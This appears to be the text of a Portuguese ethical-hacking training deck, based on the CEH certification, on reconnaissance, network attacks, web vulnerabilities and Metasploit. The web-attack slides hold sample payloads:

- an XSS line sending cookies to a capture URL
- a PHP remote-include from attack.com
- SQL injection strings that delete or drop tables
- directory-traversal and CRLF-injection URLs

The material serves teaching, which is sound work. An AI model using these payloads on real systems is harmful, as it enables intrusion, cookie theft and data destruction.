Ethical Hacking - Slide completo

75 %
25 %
Information about Ethical Hacking - Slide completo
Technology

Published on March 9, 2014

Author: mflavio2k

Source: slideshare.net

Description

Slide sobre Ethical Hacking de Marcos Flávio Araújo Assunção, autor de 9 livros sobre o tema. É baseado na certificação CEH (Certified Ethical Hacker) mas toma certas liberdades de abordar alguns outros assuntos (como Wi-Fi e Metasploit) mais a fundo.

OBS: Apesar do nome "completo" ainda ficaram faltando alguns assuntos a serem adicionados na futura revisão do slide, como por exemplo: Encadeamento de Proxys e outras técnicas de anonimidade (como a rede Tor), polimorfismo de payloads, técnicas de heap spraying, burlando ferramentas do tipo stack guard, DDoS com múltiplas técnicas encadeadas (não só syn flood com rede zumbi) e outras mais. Assim que tiver um tempinho, adaptarei os slides que faltaram destes assuntos.

Ethical Hacking Marcos Flávio Araújo Assunção Certified Ethical Hacker mflavio@defhack.com www.defhack.com.br

Apresentação do palestrante Marcos Flávio Araújo Assunção

Formação Mestrando em Sistemas de Informação, Universidade Fumec. Especialista em Docência para o Ensino Técnico Superior, Senac Minas. Especialista em Redes de Computadores, ESAB. Vitória, ES. Tecnólogo em Engenharia de Software, UNATEC. Belo Horizonte, MG. Marcos Flávio Araújo Assunção

Atuação profissional Professor do Senac Minas e do Centro Universitário UNA Fundador da empresa DefHack Tecnologia (www.defhack.com.br). Palestrante e Keynote em seminários sobre Ethical Hacking Certified Ethical Hacker pelo EC-COUNCIL Autor de 9 livros sobre Hacking e Segurança Marcos Flávio Araújo Assunção

Publicações Guia do Hacker Brasileiro Desafio Linux Hacker Segredos do Hacker Ético 1ª ,2ª, 3ª, 4ª e 5ª Edições Honeypots e Honeynets Wireless Hacking Marcos Flávio Araújo Assunção

Publicações Marcos Flávio Araújo Assunção

Treinamentos em Ethical Hacking – Desde 1999 Marcos Flávio Araújo Assunção

Keynote em eventos de Ethical Hacking – Lisboa 2006 Marcos Flávio Araújo Assunção

Keynote em eventos de Ethical Hacking – Lisboa 2008 Marcos Flávio Araújo Assunção

Keynote em eventos de Ethical Hacking – Maputo 2014 Marcos Flávio Araújo Assunção

Certificações Certified Ethical Hacker Cisco Certified CCNA Instructor Trainer (ITQ) Marcos Flávio Araújo Assunção

Citações Profissionais ( 2003 ) EUA. The New York Times, “Brazil Becomes a cybercrime lab”. Por Tony Smith ( 2007 ) Portugal. GQ Portugal, “Hacker Ético”, por Miguel dos Santos ( 2008) Reino Unido. McMafia, “Code Orange”, Por Misha Glenny Marcos Flávio Araújo Assunção

Projetos Valhala Honeypot -Detecção de Intrusos - Pote de mel -Grátis - Totalmente em português - Mais de 30 mil usuários www.superdownloads.com.br Marcos Flávio Araújo Assunção

Segurança? Isso existe? Conheces teu inimigo e conhece-te a ti mesmo; se tiveres cem combates a travar, cem vezes serás vitorioso – Sun Tzu Marcos Flávio Araújo Assunção

Por que não estamos seguros?  Configurações malfeitas  Softwares com falhas  Redes desprotegidas  Proteções ineficazes  Falta de atualizações  Fator humano Vulnerabilidade Marcos Flávio Araújo Assunção

62milsenhas-lulzsec Marcos Flávio Araújo Assunção

220 sites fora hackeados - jusbrasil Marcos Flávio Araújo Assunção

Segurança por obscuridade  Segurança Passiva - Semi-automática - Desatualizada - Pouco eficiente  Segurança Ativa - Manual - Bastante atualizada - Alta eficiência Por que usar senhas complexas? Marcos Flávio Araújo Assunção

Tipos de “Hackers”  Black Hat (Cracker)  White Hat (Ethical Hacker)  Gray Hat (indeciso) Marcos Flávio Araújo Assunção

Crackers famosos Marcos Flávio Araújo Assunção

414s • Década de 80 • Invadiram Security Pacific Bank e Alamos National Laboratory • Primeiro caso famoso na mídia • Contribuiu para aprovação de leis contra hacking Marcos Flávio Araújo Assunção

John Draper • Década de 70 • Captain Crunch • Apito • Phreaking •Recentemente: - Empresário - Firewall CrunchBox Marcos Flávio Araújo Assunção

Robert Morris Jr. • Ano de 1988 • Primeiro Worm • MIT • Derrubou 6 mil computadores • Recentemente: - Empresário - ViaWeb (Yahoo Store) - Y Combinator Marcos Flávio Araújo Assunção

Kevin Poulsen • Década de 80 • KIIS-FM e o Porsche 944 • 51 meses de prisão • Recentemente: - Jornalista - SecurityFocus Marcos Flávio Araújo Assunção

Kevin Mitnick • Década de 90 • Invadiu Sun, Nokia, Motorola e outras • Free Kevin • Takedown • Atualmente: - Empresário e autor - Defensive Thinking - A arte de enganar Marcos Flávio Araújo Assunção

Adrian Lamo • Década de 2000 • Invadiu NYT, Microsoft e outros • Capturado em 2003 e julgado em 2004 • Libertado em 2006 • Recentemente - Analista freelancer - “Can you hack it” Marcos Flávio Araújo Assunção

Adrian, Mitnick e Poulsen • Foram presos • Se tornaram famosos • Trabalham atualmente com segurança • São minoria Marcos Flávio Araújo Assunção

O Hacker Ético é uma necessidade do mercado ou apenas uma “frescura” adolescente? Marcos Flávio Araújo Assunção

MCT convida movimento Hacker brasilgov Marcos Flávio Araújo Assunção

Precisa-se de Hackers experientes estadominas-online Marcos Flávio Araújo Assunção

Governo americano recruta hackers globodigital Marcos Flávio Araújo Assunção

Hacker Ético, um aliado na segurança. hojeemdia Marcos Flávio Araújo Assunção

Hacker Ético na mira das empresas infoexame Marcos Flávio Araújo Assunção

Cresce a busca pelo Hacker Ético jornal-o-globo Marcos Flávio Araújo Assunção

Hackers tem o apoio oficial do MCT olhardigital Marcos Flávio Araújo Assunção

Governo federal contratará Hackers profissionaisti Marcos Flávio Araújo Assunção

Forbes – Hacker Ético é uma das principais carreiras do futuro Marcos Flávio Araújo Assunção

O papel do Hacker Ético – O que é um Penetration Test? Marcos Flávio Araújo Assunção

Você usaria um produto que nunca foi testado na prática? capacete-destruído Marcos Flávio Araújo Assunção

Teste de “stress” – Uma necessidade real capacete-moto Marcos Flávio Araújo Assunção

Teste de “stress” - Pressão capacete Marcos Flávio Araújo Assunção

Teste de “stress” - Temperatura flame-test-helmet Marcos Flávio Araújo Assunção

Penetration Test (Teste de Invasão)  Consiste em utilizar técnicas de Hackers em testes de stress da segurança de redes e sistemas  É a principal ferramenta de um Hacker Ético  Abordado pelo CEH (Certified Ethical Hacking) “Invadir para proteger” Marcos Flávio Araújo Assunção

Certificação de Hackers Éticos eccouncil Marcos Flávio Araújo Assunção

Níveis de um Pentester / Ethical Hacker Nível 1 – Júnior – Tool based Penetration Tester: Esse profissional é aquele que somente conhece as ferramentas básicas para o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas. Muitas vezes aprenderam as técnicas em treinamentos específicos. É neste nível que são “graduados” os profissionais CEH (Certified Ethical Hackers) Nível 2 – Pleno – Coding based Penetration Tester: Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda utiliza muitos recursos já “prontos” (como o Metasploit) para acelerar o processo de teste das vulnerabilidades. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação. Nível 3 – Sênior – Vulnerability Researcher: Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. O Google por exemplo costuma dar prêmios a quem descobre falhas no Chrome. Marcos Flávio Araújo Assunção

Tipos de Penetration Test Black Box White Box Gray Marcos Flávio Araújo Assunção Box

Black Box Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa. Marcos Flávio Araújo Assunção

Gray Box Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc. Marcos Flávio Araújo Assunção

White Box Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc. Marcos Flávio Araújo Assunção

Quando se utilizar de um PenTest? “Quebrar” ao invés de “rastrear” PenTest x Perícia Forense Caso : HD do Daniel Dantas Marcos Flávio Araújo Assunção

Metodologias de Penetration Test Marcos Flávio Araújo Assunção

Metodologias de Penetration Test  O que é uma metodologia de PenTest?  Por que devemos seguir uma metodologia?  Vantagens e desvantagens Marcos Flávio Araújo Assunção

Metodologias de Penetration Test  OSSTMM ○  http://www.isecom.org/osstmm/ ISSAF ○ http://www.oissg.org/issaf Marcos Flávio Araújo Assunção

OSSTMM (Open Source Security Testing Methodology Manual)  OSSTMM  Metodologia mais popular  Os testes são discutidos em um alto nível  Inclui tecnologias únicas (RFID, infravermelho)  Não se baseia fortemente em ferramentas  BackTrack se baseia nessa metodologia Marcos Flávio Araújo Assunção

OSSTMM  OSSTMM  Vantagens  Maior flexibilidade para PenTesters  Atualizações frequentes  Desvantagens  Maior curva de aprendizado • Conhecimento de ferramentas e Sistemas Operacionais necessários como pré-requisito  Versões mais novas requerem pagamento Marcos Flávio Araújo Assunção

ISSAF (Information Systems Security Assessment Framework)  Contém dois documentos separados  Gerenciamento (ISSAF0.2.1A)  Penetration Testing (ISSAF0.2.1B)  Checklists para Auditoria / Proteção de Sistemas  Centrado em ferramentas Marcos Flávio Araújo Assunção

ISSAF Vantagens ○ ○ Não exige conhecimento prévio de ferramentas e sistemas operacionais Fornece exemplo do uso de ferramentas de PenTest Desvantagens ○ ○ Rapidamente desatualizado Exemplos de ferramentas de PenTest não são extensivos Marcos Flávio Araújo Assunção

Fases do ISSAF O ISSAF é constituído de 5 fases:  Fase I – Planejamento  Fase II – Análise  Fase III – Tratamento  Fase IV – Resultados  Fase V – Manutenção Marcos Flávio Araújo Assunção

Fases de um Penetration Test Marcos Flávio Araújo Assunção

Fases de um PenTest (Ataque) Marcos Flávio Araújo Assunção

Vulnerabilidades Categorias  Configuração  Redes  Dispositivos móveis  Software  Malware  Físicas  Humanas Tipo • Cliente • Servidor Atuação • Local • Remota Meio • Informática • Telefone / outros Marcos Flávio Araújo Assunção

Etapas técnicas de um PenTest Marcos Flávio Araújo Assunção

FootPrinting Marcos Flávio Araújo Assunção

Pesquisa inicial (FootPrinting)  Pesquisa geral  Ping e traceroute  Sites de emprego  Whois (internic e arin)  DNS Zone Transfer  Google  Archive.Org  Mail Tracking Marcos Flávio Araújo Assunção

Ping e traceroute  Permitem descobrir informações como: - IP e nome de servidores e roteadores intermediários - Se há bloqueio de firewalls filtro de pacote Marcos Flávio Araújo Assunção

Pesquisando sites de emprego  Vagas de emprego frequentemente revelam mais do que deveriam sobre a estrutura de TI de uma empresa Marcos Flávio Araújo Assunção

Whois – Pesquisando domínios  Permite descobrir informações sobre um domínio  Vários sites podem ser usados. Exemplo: registro.br e internic.net Marcos Flávio Araújo Assunção

Whois – Pesquisando IPs   ARIN.NET Permite descobrir o range de endereços IP de uma rede pública Marcos Flávio Araújo Assunção

DNS Zone Transfer    Transfere zonas de servidores DNS secundários vulneráveis Pode usar o dig ou o nslookup Exemplo (nslookup): server ns2.empresa.com set type=ANY ls –d empresa.com Marcos Flávio Araújo Assunção

Google Hacking  Descobrir informações pelo google usando comandos como site, filetype, inurl e index of, entre outros. Marcos Flávio Araújo Assunção

Archive.Org – WayBack Machine  Permite visualizar versões passadas de qualquer website já criado desde o surgimento da WEB.  Extremamente útil para ver a evolução de uma empresa  Mostra o “ano” de quando o site foi criado. Isso é muito relevante pois podemos saber quando a empresa começou a atuar.  Outra vantagem: poder “rever” o conteúdo de um site que já saiu do ar. Marcos Flávio Araújo Assunção

Archive.Org – WayBack Machine Marcos Flávio Araújo Assunção

Mail Tracking Mail Tracking é um serviço extremamente útil, que permite monitorar os e-mails que você envia para saber se o destinatário leu a mensagem, o horário que isto aconteceu – e o mais importante – o endereço IP do sistema que destinatário estava utilizando no momento. Marcos Flávio Araújo Assunção

Mail Tracking Basta se cadastrar no site e mandar o seu e-mail com “mailtracking.com” no final da mensagem. Exemplo: fulano@empresa.com.br.mailtracking.com . Assim que o destinatário abrir a mensagem, logue no mailtracking e veja os dados capturados: Marcos Flávio Araújo Assunção

Varredura e Enumeração Marcos Flávio Araújo Assunção

Etapas da Varredura  Varredura de hosts (endereços IP) na rede  Varredura de portas (serviços ativos) Marcos Flávio Araújo Assunção

Varredura de IPs     Tem como objetivo descobrir as máquinas ativas da rede Ping Sweep UDP Scan Softwares: ping, hping3, nmap (sV), superscan, etc. Marcos Flávio Araújo Assunção

Varredura de portas    Tem como objetivo identificar os serviços ativos no sistema Softwares usados: NMAP, Superscan, etc. Tipos de varredura: Full, Half-Syn, FIN, ACK, XMAS, NULL, UDP, etc. Marcos Flávio Araújo Assunção

Enumeração      Tem como objetivo identificar os serviços rodando nas portas e o sistema operacional do alvo Captura de banners Fingerprint Sessão Nula (old!) Regras de Firewall Marcos Flávio Araújo Assunção

Captura de Banners     Basta se conectar ao serviço usando telnet Muitos serviços não são configurados para alterar o banner padrão Mostra o nome e a versão do software Informação pouco confiável Marcos Flávio Araújo Assunção

Fingerprint  Usa um banco de dados de “impressões digitais” para identificar o serviço  Baseia-se na análise do comportamento de pacotes Marcos Flávio Araújo Assunção

Fingerprint com o NMAP Sistema Operacional: (opção –O)) Serviços das portas: (opção –A)) Marcos Flávio Araújo Assunção

Vulnerabilidades de Senhas Marcos Flávio Araújo Assunção

Autenticação por senhas  Senhas fracas  Bloqueio por tentativas  “Tentativa e erro”  Força-Bruta local (eficiente)  Força-Bruta remota (não tão eficiente)  Wordlists (dicionários)  Rainbow Tables Marcos Flávio Araújo Assunção

Força-Bruta remota - xHydra Muito usado em sistemas Linux. Permite forçabruta em diversos protocolos de aplicação: HTTP, FTP, SQL, VNC e muito mais. Entretanto, somente trabalha com wordlists. Marcos Flávio Araújo Assunção

Força-Bruta remota - Brutus Para sistemas Windows Mais limitado e com suporte a menos protocolos que o XHydra Entretanto, trabalha com “bruteforce real” ao invés de somente wordlists Marcos Flávio Araújo Assunção

Força-Bruta local - Cain Para sistemas Windows Permite tentar descobrir localmente diversos tipos de hash Tem suporte a, entre outros: LM, NTLM, MD5, SHA-1, WPA1, etc. Marcos Flávio Araújo Assunção

Força-Bruta local - Cain Marcos Flávio Araújo Assunção

Rainbow Tables São “tabelas” que podem ser geradas ou baixadas da Internet Visam “acelerar” o processo de força-bruta local ao pesquisar hashes já descobertos O WINRTGEN permite gerar suas próprias RTs Marcos Flávio Araújo Assunção

Rainbow Tables Online Muitos sites oferecem o serviço de rainbow tables online Isso permite que você quebre diversos tipos de hash em questão de segundos Sites: Online Hash Crack e CrackStation, entre outros. Marcos Flávio Araújo Assunção

Vulnerabilidades de Rede Marcos Flávio Araújo Assunção

Vulnerabilidades de rede Podemos dizer que as vulnerabilidades de rede mais comuns são:  Farejamento (sniffing)  Redirecionamento de tráfego  Spoofing  Hijacking  Man in the middle Marcos Flávio Araújo Assunção

Farejamento de tráfego  Sniffers  Modo promíscuo  Dados sem criptografia  Passivo  Capturando senhas  Limitado Marcos Flávio Araújo Assunção

Redirecionamento de tráfego  Sniffing ativo  Farejar tráfego de outros dispositivos  Redirecionar o tráfego para o ponto desejado  ARP Poisoning  ICMP redirect  DHCP Spoofing  Port Stealing Marcos Flávio Araújo Assunção

Arp Poisoning VLANs Address Resolution Protocol (ARP) Cache ARP Dinâmico x Estático Port Security não protege contra isto. Marcos Flávio Araújo Assunção

ICMP Redirect Outro método interessante ICMP Type 5 Redirect “Sou a melhor rota” Bom para redirecionar tráfego de roteadores Marcos Flávio Araújo Assunção

DHCP Spoofing Spoof = falso Servidor DHCP Atribui endereços antes do verdadeiro servidor Condição de corrida Marcos Flávio Araújo Assunção

Port Stealing Nível de enlace Portas do Switch Ethernet frames Spoofing/Poisoning Permite capturar o tráfego de VLANs mal configuradas ao se passar por um tronco (802.1d trunk) Marcos Flávio Araújo Assunção

Man in The Middle Colocando-se no meio da transação Marcos Flávio Araújo Assunção

Man in the Middle  No “meio” da transmissão  Sessão dupla  Local (ARP)  Remoto (Proxy)  Tráfego criptografado Marcos Flávio Araújo Assunção

MITM – Lado Cliente Ponta Cliente Inicia a conexão Responsável por dados de autenticação, como senhas e cookies de sessão Autenticação alterada “on the fly” Marcos Flávio Araújo Assunção

MITM – Lado Servidor Ponta servidor Responde às solicitações da conexão cliente Diz se o cliente está autenticado ou não Manipulação de html “Entre novamente com a senha” Marcos Flávio Araújo Assunção

Como é possível o MITM? Interceptação do certificado “real” do servidor verdadeiro Chaves Certificado Digital “falso” enviado ao cliente Conexão dupla criptografada  O browser reclama, mas não impede na maioria dos casos Os avisos do browser podem ser removidos por outras técnicas Marcos Flávio Araújo Assunção

Alguns protocolos suportados pelo MITM Secure Socket Layer (SSL) Secure Shell (SSHv1) Remote Desktop Protocol (RDP) Marcos Flávio Araújo Assunção

Softwares de rede local para MITM Marcos Flávio Araújo Assunção

DSniff Plataforma: Linux Redirecionamento : Arp poisoning arpspoof macof webmitm sslmitm Marcos Flávio Araújo Assunção

Ettercap Plataforma: Linux e Windows Redirecionamento : Arp Poisoning, Port Stealing, ICMP Redirect e DHCP Spoofing Pode sequestrar a sessão Possui diversos plugins Marcos Flávio Araújo Assunção

CAIN Plataforma: Windows Redirecionament oarp poisoning O mais simples de se utilizar MITM de RDP MITM de DNS  Gera os certificados automaticamente Marcos Flávio Araújo Assunção

Softwares Proxy para MITM Marcos Flávio Araújo Assunção

Achilles Plataforma: Windows Proof of concept Lento Muitos erros Não separa os dados nas conexões Permite alteração limitada “on the fly” Marcos Flávio Araújo Assunção

Achilles Senha capturada por MITM de uma conexão HTTPS. Note que a janela é dos dados provenientes do lado cliente. Marcos Flávio Araújo Assunção

Paros Proxy Plataforma: Java Virtual Machine Muitos recursos Mais rápido Separa os dados em diversas “pastas” Permite filtro para alteração “on the fly” - Ex: “senha” Marcos Flávio Araújo Assunção

Spoofing e Hijacking Marcos Flávio Araújo Assunção

Spoofing  Informações falsas  Autenticação  Cliente não precisa estar online  ARP Spoofing  DNS Spoofing  IP Spoofing  MAC Spoofing Marcos Flávio Araújo Assunção

Tipos de IP Spoofing Blind IP Spoofing É o spoof “cego”. Acontece quando você envia o pacote com o IP de origem falsificado, mas como o destino está em outra rede você não consegue farejar e ver a resposta.: Non-Blind IP Spoofing Neste caso, você está na mesma LAN (e na mesma VLAN) da máquina de destino a qual você mandou o pacote spoofado. Então, farejando o trafégo com o wireshark ou outro sniffer você consegue visualiazr a “resposta”. Marcos Flávio Araújo Assunção

Non-Blind IP Spoofing com STERM: Marcos Flávio Araújo Assunção

Non-Blind IP Spoofing com STERM: Marcos Flávio Araújo Assunção

DNS Spoofing É um dos tipos mais perigosos  Permite enviar respostas “falsas” de consultas DNS a um cliente.  Pode ser facilmente realizado pelo Cain ou Ettercap se há redirecionamento de tráfego Marcos Flávio Araújo Assunção

DNS Spoofing com CAIN Marcos Flávio Araújo Assunção

Hijacking  Sequestro de sessões  Números de sequência  Necessita do cliente online  Ack Storm  Retransmissão Marcos Flávio Araújo Assunção

Hijacking  Usando firesheep para capturar cookies http e sequestrar sessões Marcos Flávio Araújo Assunção

Vulnerabilidades de Servidores e Aplicações WEB Marcos Flávio Araújo Assunção

Enganos de Segurança O Firewall protege meu servidor web e meu banco de dados  Acesso à porta 80 e 443 do seu servidor Web faz parte do seu perímetro de defesa externo  Vulnerabilidades no servidor Web ou em aplicações web podem levar à um acesso interno da rede… passando pelo firewall. Marcos Flávio Araújo Assunção

Enganos de Segurança (cont.) O IDS protege meu servidor Web e meu banco de dados O IDS é configurado para detectar assinaturas de ataques bem conhecidos  Essas assinaturas não incluem as feitas contra aplicações customizadas Marcos Flávio Araújo Assunção

Enganos de Segurança (cont.)  SSL protege meu site  SSL protege o transporte de dados entre o servidor web e o browser do usuário  SSL não protege contra ataques destinados ao cliente ou à aplicação  SSL é o melhor amigo dos hackers devido ao falso senso de segurança (vide ataques de MITM) Marcos Flávio Araújo Assunção

Falhas clássicas em Servidores Web Marcos Flávio Araújo Assunção

Buffer Overflow Exploração de falhas muito utilizada ainda hoje  Dados de entrada > buffer (- tratamento)  IIS  Apache  Shell remoto ou outro payload  Acesso à rede interna  Também acontece com aplicações web  Marcos Flávio Araújo Assunção

Injeção de comandos em Hexa Codificando em hexa as strings das URLs, pode ser possível burlar filtros de segurança e IDS. http://www.site.com/cgi?arquivo=/etc/passwd Pode ficar assim: http://www.site.com/cgi?arquivo=/%2F%65%74%63 %2F%70%61%73%73%77%64 Marcos Flávio Araújo Assunção

Codificação dupla em hexa Primeira: scripts/..%255c../winnt se torna: scripts/..%5c../winnt (%25 = caractere “%”) Segunda: scripts/..%5c../winnt se torna: scripts/..../winnt Travessia de diretórios agora é possível utilizando codificação dupla em hexa. Marcos Flávio Araújo Assunção

Barra em Unicode Em unicode, “%c0%af”, é o equivalente à barra (“/”). Então, um exploração ficaria: scripts/..%c0%af../winnt E seria convertido para: scripts/../../winnt Travessia de diretórios também é possível usando ofuscação através do Unicode Marcos Flávio Araújo Assunção

Falhas em Aplicações Web Marcos Flávio Araújo Assunção

Entrada maliciosa - Injection  Problema muito comum  Filtro malfeito  Lado servidor  SQL Injection ‘’ or’=‘ ‘ 1 = 1 -- Marcos Flávio Araújo Assunção

Saída maliciosa - XSS  Mesmo princípio do injection  Tipo cliente  Utilizado normalmente para captura de cookies Marcos Flávio Araújo Assunção

Problemas comuns  Algoritmo fraco – Muitos sites web hoje estão usando algoritmos lineares baseados em variáveis previsíveis, como tempo ou endereço IP.  Sem bloqueio de conta – Pode ser feito ataques de força-bruta na ID de sessão sem que o servidor web reclame.  Expiração indefinida – Se a sessão não expira facilmente, o invasor tem tempo quase ilimitado para tentar descobrir o ID. Marcos Flávio Araújo Assunção

IDs em Campos Ocultos <FORM METHOD=POST ACTION="/cgibin/access.cgi"> <input type="hidden" name="sessionID" value=”abc123”> <input type="hidden" name=“usuario" value=”Carol”> <input type="submit" name=“Logar no sistema"></form> Marcos Flávio Araújo Assunção

Cross Site Scripting (XSS)  Atacante injeta scripts (JavaScript) no browser  O código é executado pelo browser para realizar alguma ação  Muito usado para roubar cookies  Funciona geralmente no lado cliente Marcos Flávio Araújo Assunção

Cross-Site Request Forgeries (CSRF)  Evolução do Cross Site Scripting  Usar POST em vez de GET  Forçar o uso de forms próprios via TOKEN aleatório  Mais difícil de impedir que XSS [img]http://seuforum.com/novaresposta.php? action=newthread&subject=teste&body=alguma+coisa+aq ui&submit=go[/img] Marcos Flávio Araújo Assunção

CRLF Injection  Carrier Return and Line Feed (CRLF)  Caracteres especiais que representam o “fim da linha” (end of line – EOL)  O servidor “verdadeiro” gera o código HTML, o que torna o ataque perigoso.  Exemplo: http://www.seusite.com.br/somepage.php?page=%0d%0aContentType: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContentType: text/html%0d%0a%0d%0a%3Chtml%3EConteúdo Hacker %3C/html%3E O usuário verá uma página com os dizeres “Conteúdo Hacker” escrito na mesma. Marcos Flávio Araújo Assunção

Explorando Filtros malfeitos Marcos Flávio Araújo Assunção

PHP Injection   Includes mal configurados permitem que outro script remoto seja executado Isso permite que você execute programas no sistema, obtenha arquivos, etc. script.php?file=http://site.com/script script.php?cmd=-la | wall bom dia <? <? include "$file.inc"; //include “http://attack.com/script.inc"; system("ls $cmd"); //system("ls -la | wall bom dia"); ?> ?> Marcos Flávio Araújo Assunção

Exemplos de XSS  <script> alert(‘Oi’!) </script>  <script> location.href=“http://www.site.com/captura.cfm?c=“ + document.cookie</script>  <a href=“javas&#99;ript&#35;[código]>  <div style=“behaviour: url([código]);”>  <body onload=“[código]”>  <img src=“javascript:[código]”> Marcos Flávio Araújo Assunção

SQL Injection  SQL Injection é um ataque de injeção de comandos causado por uma entrada de dados não validada corretamente  O atacante inclui uma entrada maliciosa com a intenção de alterar a consulta ao banco de dados realizada  Funciona apenas no lado servidor Marcos Flávio Araújo Assunção

Métodos do SQL Injection O SQL Injection pode ser utilizado com dois métodos do HTTP:  GET – Nesse método a inserção dos comandos SQL é realizada diretamente na URL do site. Exemplo: GET /usuarios.asp?sobrenome=assuncao’;DELETE FROM users WHERE 1=‘1 HTTP/1.1  POST – Nesse método a inserção dos comandos SQL é feita nos campos de um formulário. Exemplo: Marcos Flávio Araújo Assunção ‘’ OR ‘=‘

Tipos de SQL Injection Existem dois tipos básicos de SQL Injection  Error Based SQL Injection – O atacante detecta que o website é vulnerável devido a erros de SQL mostrados na tela, usando-os também para guiar o ataque.  Blind SQL Injection – O site é vulnerável a SQL Injection mas não apresenta nenhum tipo de erro ao atacante, o que torna mais difícil de detectar a falha. Marcos Flávio Araújo Assunção

Error Based SQL Injection (POST) Marcos Flávio Araújo Assunção

Error Based SQL Injection (POST) Marcos Flávio Araújo Assunção

SQL Injection: Exemplo normal 1 GET /view_account.cfm?acct_id=10 HTTP/1.1 SELECT * FROM accounts WHERE acct_id = 10 Marcos Flávio Araújo Assunção

SQL Injection : Exemplo injeção 1 GET /view_account.cfm?acct_id=10 OR 1=1 HTTP/1.1 SELECT * FROM accounts WHERE acct_id = 28 OR 1=1 -- Marcos Flávio Araújo Assunção

SQL Injection: Exemplo normal 2 GET /user_lookup.cfm?lastname=assuncao HTTP/1.1 SELECT * FROM users WHERE lastname = ‘assuncao’ Marcos Flávio Araújo Assunção

SQL Injection: Exemplo injeção 2 GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users WHERE 1=‘1 HTTP/1.1 SELECT * FROM users WHERE lastname = ‘assuncao’;DELETE FROM users WHERE 1=‘1’ Marcos Flávio Araújo Assunção

SQL Injection - Dicas  acct_id=10 OR 1 = ‘1’  Tente várias cláusulas OR usando <>, >, >=, LIKE, etc.  Use comandos para acabar prematuramente com uma consulta  SELECT * FROM users WHERE user_id = 1-- AND password=‘minhasenha’  Enumerar informação do banco de dados  acct_id=10 UNION SELECT name [,1,2,…] FROM objetos WHERE xtype=‘U’  acct_id=10 UNION SELECT [colunas] FROM [tabela]  UNION requer que ambos os pedidos compartilhem um número comum de colunas, acrescentando colunas quando requerido Marcos Flávio Araújo Assunção

SQL Injection – Automatização  Alguns softwares de vulnerabilidade permitem detectar erros de SQL automaticamente. Alguns exemplos:  Nessus  SQLFinder  Acunetix  WVS Existem até alguns programas que podem explorar automaticamente o SQL Injection, automatizando o processo. Exemplos:  Havij  SQL Ninja  Fast-Track  Metasploit Marcos Flávio Araújo Assunção

Exemplo: Havij (SQL Injection GET) Marcos Flávio Araújo Assunção

Exemplo: Havij (Online Crack MD5) Marcos Flávio Araújo Assunção

SQL Injection: Indo além  Concatene múltiplos comandos  acct_id=28; DROP TABLE Users;  Procedimentos úteis  xp_msver  xp_cmdshell [command] -> PERIGO!  xp_servicecontrol [action] [service] Marcos Flávio Araújo Assunção

Exemplo xp_cmdshell Marcos Flávio Araújo Assunção

Exemplo xp_cmdshell Marcos Flávio Araújo Assunção

Considerações sobre o SQL Server O SQL Server vem por padrão com o usuário ‘sa’ (system administrator).  Muitos administradores não colocam senhas muito complexas para este usuário O BackTrack possui várias ferramentas para tentar fazer força bruta na conta sa e, caso a senha seja descoberta, pode-se executar o xp_cmdshell sem precisar de SQL Injection. Marcos Flávio Araújo Assunção

Vulnerabilidades de Software – Exploração de falhas Marcos Flávio Araújo Assunção

Objetivos da exploração de falhas  Falhas remotas – Ganhar acesso não autorizado ao sistema alvo (normalmente ao shell) ou causar Denial of Service  Falhas locais – Elevar os privilégios de acesso para root/system ou causar Denial of Service Normalmente um atacante irá explorar uma falha remota para invadir um sistema e loco depois tentará a elevação de privilégios. O motivo para isto é que a maioria dos serviços hoje rodam no perfil de usuários com poucos privilégios como o nobody/guest. Marcos Flávio Araújo Assunção

Tipos de falhas  Stack overflow  Heap overflow  Heap Spraying  Memory Corruption  String format  Race conditions  Privilege Escalation Marcos Flávio Araújo Assunção

Pesquisa manual por Falhas - SecurityFocus Marcos Flávio Araújo Assunção

Scanners “genéricos” de vulnerabilidades Não se focam em um serviço específico. São como um médico generalista, detectam “superficialmente” problemas em vários protocolos. Exemplos de softwares: Nessus, Retina, Languard, Shadow Security Scanner Boa opção para uma grande rede corporativa Marcos Flávio Araújo Assunção

Scanners “especialistas” de vulnerabilidades Focam em poucos protocolos e serviços (normalmente apenas um), por isso fazem uma análise mais apurada. Há muitos scanners destes para http, sql, etc. Exemplos de softwares: Nikto, SQLMap, SQL Ninja, Acunetix, W3AF, etc. Marcos Flávio Araújo Assunção

Descobrindo novas falhas – Zero Day           Debugger / dissambler Fuzzing Registradores ESP (Stack Pointer) EBP (Base ponter) EIP (Instruction pointer) Breakpoints NOP Slide Payload Exploit Marcos Flávio Araújo Assunção

Metasploit Framework • Criado por HD Moore, é hoje o framework de exploração de falhas mais utilizado. • Extremamente customizável • Atualizações frequentes • Possibilidade de criação de scripts • Muitas opções de payloads • Métodos para se burlar firewalls e anti-vírus • Meterpreter • Interface console, gui e web Marcos Flávio Araújo Assunção

MetaSploit Framework •Framework de testes • Objetivo • Metodologia blackbox • Explora Bugs através de exploits Ex: Buffer Overflows Marcos Flávio Araújo Assunção

Metasploit Framework  Selecionar exploit  Selecionar alvo  Selecionar Payload  Aguardar resultado  Acessar shell remoto Marcos Flávio Araújo Assunção

Metasploit – Suíte completa O Metasploit Framework (MSF) vem com muitos utilitários para auxiliar na realização da exploração. Vamos estudar os principais: msfconsole, msfcli, msfpayload e msfencode. Marcos Flávio Araújo Assunção

